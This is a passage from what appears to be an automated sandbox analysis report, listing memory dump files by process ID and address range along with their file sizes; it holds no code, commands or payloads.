                                                                            • memory/1096-97-0x000000001B720000-0x000000001B721000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1096-99-0x000000001B500000-0x000000001B501000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1204-78-0x0000000000000000-mapping.dmp
                                                                            • memory/1204-157-0x0000000000000000-mapping.dmp
                                                                            • memory/1224-207-0x0000000000000000-mapping.dmp
                                                                            • memory/1336-178-0x0000000000000000-mapping.dmp
                                                                            • memory/1364-169-0x0000000000000000-mapping.dmp
                                                                            • memory/1520-162-0x0000000000000000-mapping.dmp
                                                                            • memory/1520-194-0x0000000000000000-mapping.dmp
                                                                            • memory/1520-205-0x0000000000000000-mapping.dmp
                                                                            • memory/1600-166-0x0000000000000000-mapping.dmp
                                                                            • memory/1604-182-0x0000000000000000-mapping.dmp
                                                                            • memory/1604-204-0x0000000000000000-mapping.dmp
                                                                            • memory/1692-185-0x0000000000000000-mapping.dmp
                                                                            • memory/1696-168-0x0000000000000000-mapping.dmp
                                                                            • memory/1700-165-0x0000000000000000-mapping.dmp
                                                                            • memory/1732-128-0x000000001AC24000-0x000000001AC26000-memory.dmp
                                                                              Filesize

                                                                              8KB

                                                                            • memory/1732-129-0x0000000002670000-0x0000000002671000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1732-134-0x00000000024B0000-0x00000000024B1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1732-121-0x0000000000000000-mapping.dmp
                                                                            • memory/1732-131-0x000000001AB90000-0x000000001AB91000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1732-126-0x000000001AC20000-0x000000001AC22000-memory.dmp
                                                                              Filesize

                                                                              8KB

                                                                            • memory/1732-133-0x0000000002730000-0x0000000002731000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1740-196-0x0000000000000000-mapping.dmp
                                                                            • memory/1740-203-0x000000001952A000-0x0000000019549000-memory.dmp
                                                                              Filesize

                                                                              124KB

                                                                            • memory/1740-202-0x0000000019524000-0x0000000019526000-memory.dmp
                                                                              Filesize

                                                                              8KB

                                                                            • memory/1740-201-0x0000000019520000-0x0000000019522000-memory.dmp
                                                                              Filesize

                                                                              8KB

                                                                            • memory/1744-86-0x00000000027E0000-0x00000000027E1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1744-74-0x000000001B620000-0x000000001B621000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1744-101-0x000000001AB7A000-0x000000001AB99000-memory.dmp
                                                                              Filesize

                                                                              124KB

                                                                            • memory/1744-85-0x000000001B810000-0x000000001B811000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1744-70-0x0000000002470000-0x0000000002471000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1744-84-0x000000001B790000-0x000000001B791000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1744-82-0x00000000024B0000-0x00000000024B1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1744-69-0x0000000002380000-0x0000000002381000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1744-156-0x000000001C6A0000-0x000000001C6A1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1744-68-0x000000001ABF0000-0x000000001ABF1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1744-72-0x000000001AB74000-0x000000001AB76000-memory.dmp
                                                                              Filesize

                                                                              8KB

                                                                            • memory/1744-67-0x0000000002430000-0x0000000002431000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1744-66-0x000007FEFB891000-0x000007FEFB893000-memory.dmp
                                                                              Filesize

                                                                              8KB

                                                                            • memory/1744-65-0x0000000000000000-mapping.dmp
                                                                            • memory/1744-71-0x000000001AB70000-0x000000001AB72000-memory.dmp
                                                                              Filesize

                                                                              8KB

                                                                            • memory/1760-187-0x0000000000000000-mapping.dmp
                                                                            • memory/1760-171-0x0000000000000000-mapping.dmp
                                                                            • memory/1772-206-0x0000000000000000-mapping.dmp
                                                                            • memory/1772-176-0x0000000000000000-mapping.dmp
                                                                            • memory/1776-164-0x0000000000000000-mapping.dmp
                                                                            • memory/1776-183-0x0000000000000000-mapping.dmp
                                                                            • memory/1788-191-0x0000000000000000-mapping.dmp
                                                                            • memory/1828-75-0x0000000000000000-mapping.dmp
                                                                            • memory/1864-195-0x0000000000000000-mapping.dmp
                                                                            • memory/1864-184-0x0000000000000000-mapping.dmp
                                                                            • memory/1868-192-0x0000000000000000-mapping.dmp
                                                                            • memory/1872-188-0x0000000000000000-mapping.dmp
                                                                            • memory/1924-174-0x0000000000000000-mapping.dmp
                                                                            • memory/1972-160-0x0000000000000000-mapping.dmp
                                                                            • memory/1980-173-0x0000000000000000-mapping.dmp
                                                                            • memory/2008-62-0x00000000411C4000-0x00000000411C6000-memory.dmp
                                                                              Filesize

                                                                              8KB

                                                                            • memory/2008-61-0x00000000411C2000-0x00000000411C4000-memory.dmp
                                                                              Filesize

                                                                              8KB

                                                                            • memory/2008-63-0x00000000411C6000-0x00000000411C7000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/2008-59-0x0000000041670000-0x0000000041A91000-memory.dmp
                                                                              Filesize

                                                                              4.1MB

                                                                            • memory/2008-64-0x00000000411C7000-0x00000000411C8000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/2040-170-0x0000000000000000-mapping.dmp